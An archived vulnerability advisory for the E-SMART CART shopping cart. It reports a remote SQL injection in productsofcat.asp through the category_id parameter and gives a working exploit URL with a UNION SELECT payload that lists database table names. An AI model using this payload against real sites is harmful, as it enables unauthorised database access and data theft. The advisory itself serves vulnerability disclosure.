Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: e-commerce, shopping carts :: bx3513.htm

E-SMART CART (productsofcat.asp) Remote SQL Injection Vulnerability



E-SMART CART (productsofcat.asp) Remote SQL Injection Vulnerability
E-SMART CART (productsofcat.asp) Remote SQL Injection Vulnerability



[+] Info:=0D
=0D
[~] Bug found by Jose Luis G=F3ngora Fern=E1ndez (JosS)=0D
[~] sys-project[at]hotmail.com=0D
[~] http://www.spanish-hackers.com/=0D 
[~] Spanish Hackers Team - [SHT]=0D
[~] EspSeC & Hack0wn!.=0D
=0D
[~] Software: E-SMART CART (payment)=0D
[~] HomePage: http://www.preproject.com/=0D 
[~] Exploit: Remote SQL Injection [High]=0D
[~] Vuln file: productsofcat.asp=0D
=0D
[~] /store/productsofcat.asp?p=1&category_id=[SQL]=0D
=0D
[+] Exploit:=0D
=0D
[~] http://localhost/PATH/store/productsofcat.asp?p=1&category_id=[SQL]=0D 
[~] 22+and+1=2+union+all+select+1,name,3,0+from+msysobjects=0D
=0D
* In memory of rgod


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH